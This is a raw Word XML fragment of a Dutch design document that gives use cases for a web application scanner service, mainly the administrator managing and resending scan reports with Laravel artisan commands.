                    <w:p w14:paraId="672CA16E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="31"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem verzoek de klant om het nogmaals te proberen, als het dan nog steeds niet lukt de administrator te contacteren (Telefoonnummer wordt meegegeven)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3639DE91" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Extensie 3</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00453CF9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>.3a</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>:</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> gebruik extensie 1.5a</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="651C1FD7" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t>3a – Website is niet gevonden</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="02FE59AB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="32"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem stuurt een email naar de klant toe om te vermelden dat de aanvraag mislukt is</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="72C2B170" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="32"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem verzoek de klant om het nogmaals te proberen, als het dan nog steeds niet lukt de administrator te contacteren (Telefoonnummer wordt meegegeven)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="321DF7FF" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00453CF9" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C97354">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="00F32B52">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251874304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3267A760" wp14:editId="7481F9C1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-99060</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1964055</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5743575" cy="6086475"/>
                <wp:effectExtent l="0" t="0" r="28575" b="28575"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="49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6086475"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="95000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="140CC6B1" w14:textId="11A9976C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>UC-4: Beheren van rapporten</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="492F3F27" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t>De administrator beheert scan data dat geproduceerd is door de webapplicatie scanner. Met deze data kan de beheerde nieuwe rapporten genereren en handmatig de rapporten verzenden.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3496A69E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00303692" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00303692">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Acteurs</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1282C103" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t>Administrator</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3D3339C0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="004723C2" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004723C2">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Preconditie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="713B5449" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="34"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Data van een gescande website moet aanwezig zijn</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0C1D770C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00A172C0" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00A172C0">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Postconditie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="616CCB05" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="35"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Een gegenereerd rapport op basis van de scan data</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="25B5597B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="35"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het rapport is succesvol door de administrator verzonden naar de klant</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="39369548" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="002E26CF" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002E26CF">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Succes Scenario</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7E09BD93" w14:textId="622FDCB4" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="36"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De administrator opent de terminal</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1B47DC12" w14:textId="7E697FC5" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="36"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">De administrator vraagt de een lijst van rapporten op met de commando: </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>php</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>artisan</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> lijst</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="56BAA91C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="36"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem laat een overzicht zien van alle verzonden rapporten en alle niet verzonden rapporten</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5A03DC3E" w14:textId="7E6ABF53" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00BE6A62">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="36"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">De administrator kiest een rapport en verstuurt het rapport nogmaals met de commando: </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>php</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>artisan</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> verzend {</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>id</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="05AACADC" w14:textId="7C41C47A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00BE6A62">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="36"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem verzendt het rapport nogmaals naar de klant via email</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6125099E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000F574C" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="000F574C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>E</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>xtensie 4</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000F574C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>.5a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="64EEDD18" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t>5a – Na het opnieuw verzenden van de email is het weer mislukt</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3AA4D4BC" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="37"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De administrator neemt contact op met de klant</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6082032A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r w:rsidRPr="00E35161">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Informatie</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 4</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00E35161">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>.4a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="76C05E69" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="38"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Zie bijlage voor mogelijke redenen waarom een email niet gestuurd kan worden</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4CF2E186" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00303692" w:rsidRDefault="00CE4BB5"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7A760" id="_x0000_s1126" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-7.8pt;margin-top:154.65pt;width:452.25pt;height:479.25pt;z-index:251874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AQK00ICAAByBAAADgAAAGRycy9lMm9Eb2MueG1srFTbbtswDH0fsH8Q9L7aSeO2MeIUXbsOA7oL&#10;0O4DaFmOhUiiJymxu68fJadZur0NexFEkT48PCS9uh6NZnvpvEJb8dlZzpm0AhtlNxX//nT/7ooz&#10;H8A2oNHKij9Lz6/Xb9+shr6Uc+xQN9IxArG+HPqKdyH0ZZZ50UkD/gx7acnZojMQyHSbrHEwELrR&#10;2TzPL7IBXdM7FNJ7er2bnHyd8NtWivC1bb0MTFecuIV0unTW8czWKyg3DvpOiQMN+AcWBpSlpEeo&#10;OwjAdk79BWWUcOixDWcCTYZtq4RMNVA1s/yPah476GWqhcTx/VEm//9gxZf9N8dUU/HFcsmZBUNN&#10;epJbH/awZfOoz9D7ksIeewoM43scqc+pVt8/oNh6ZvG2A7uRN87h0EloiN8sfpmdfDrh+AhSD5+x&#10;oTSwC5iAxtaZKB7JwQid+vR87I0cAxP0WFwuzovLgjNBvov86mJBRswB5cvnvfPho0TD4qXijpqf&#10;4GH/4MMU+hISs3nUqrlXWicjDpy81Y7tgUal3kwl6p0hrtPbssjzNDCUMs1nDE8EXiFpy4aKL4t5&#10;MYn0Kovb1McchHYCeBpmVKCl0MpU/OoYBGWU9oNtqBIoAyg93YmNtgeto7yT0GGsx9TW5flLD2ts&#10;nkl9h9MS0NLSpUP3k7OBFqDi/scOnORMf7LUweVssYgbk4xFcTknw5166lMPWEFQFQ+cTdfbkLYs&#10;crV4Q51uVepBHImJyYEzDXYS8bCEcXNO7RT1+1ex/gUAAP//AwBQSwMEFAAGAAgAAAAhAJPAiv3h&#10;AAAADAEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNxap60ITohTIRCXSgi1hQM3&#10;J94mEfE6ip02/D3LCY6reZp5W2xn14szjqHzpGG1TEAg1d521Gh4P74sFIgQDVnTe0IN3xhgW15f&#10;FSa3/kJ7PB9iI7iEQm40tDEOuZShbtGZsPQDEmcnPzoT+RwbaUdz4XLXy3WSpNKZjnihNQM+tVh/&#10;HSanwb1WtPuknbd2Oo7PMX37wOyk9e3N/PgAIuIc/2D41Wd1KNmp8hPZIHoNi9VdyqiGTZJtQDCh&#10;lMpAVIyu03sFsizk/yfKHwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQB&#10;AAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDEBArTQgIAAHIE&#10;AAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCTwIr94QAA&#10;AAwBAAAPAAAAAAAAAAAAAAAAAJoEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAqAUA&#10;AAAA&#10;" fillcolor="#f2f2f2 [3052]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="140CC6B1" w14:textId="11A9976C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>UC-4: Beheren van rapporten</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="492F3F27" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t>De administrator beheert scan data dat geproduceerd is door de webapplicatie scanner. Met deze data kan de beheerde nieuwe rapporten genereren en handmatig de rapporten verzenden.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3496A69E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00303692" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00303692">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Acteurs</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1282C103" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t>Administrator</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3D3339C0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="004723C2" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004723C2">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Preconditie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="713B5449" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="34"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Data van een gescande website moet aanwezig zijn</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0C1D770C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00A172C0" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A172C0">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Postconditie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="616CCB05" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="35"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Een gegenereerd rapport op basis van de scan data</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="25B5597B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="35"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het rapport is succesvol door de administrator verzonden naar de klant</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="39369548" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="002E26CF" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002E26CF">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Succes Scenario</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7E09BD93" w14:textId="622FDCB4" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="36"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De administrator opent de terminal</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1B47DC12" w14:textId="7E697FC5" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="36"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">De administrator vraagt de een lijst van rapporten op met de commando: </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>php</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>artisan</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> lijst</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="56BAA91C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="36"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem laat een overzicht zien van alle verzonden rapporten en alle niet verzonden rapporten</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5A03DC3E" w14:textId="7E6ABF53" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00BE6A62">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="36"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">De administrator kiest een rapport en verstuurt het rapport nogmaals met de commando: </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>php</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>artisan</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> verzend {</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>id</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="05AACADC" w14:textId="7C41C47A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00BE6A62">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="36"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem verzendt het rapport nogmaals naar de klant via email</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6125099E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000F574C" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="000F574C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>E</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>xtensie 4</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000F574C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>.5a</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="64EEDD18" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t>5a – Na het opnieuw verzenden van de email is het weer mislukt</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3AA4D4BC" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="37"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De administrator neemt contact op met de klant</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6082032A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r w:rsidRPr="00E35161">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Informatie</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 4</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00E35161">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>.4a</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="76C05E69" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="38"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Zie bijlage voor mogelijke redenen waarom een email niet gestuurd kan worden</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4CF2E186" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00303692" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251873280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72046CF4" wp14:editId="7CABE44A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-99695</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5743575" cy="1219200"/>
                <wp:effectExtent l="0" t="0" r="28575" b="19050"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="49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219200"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="95000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
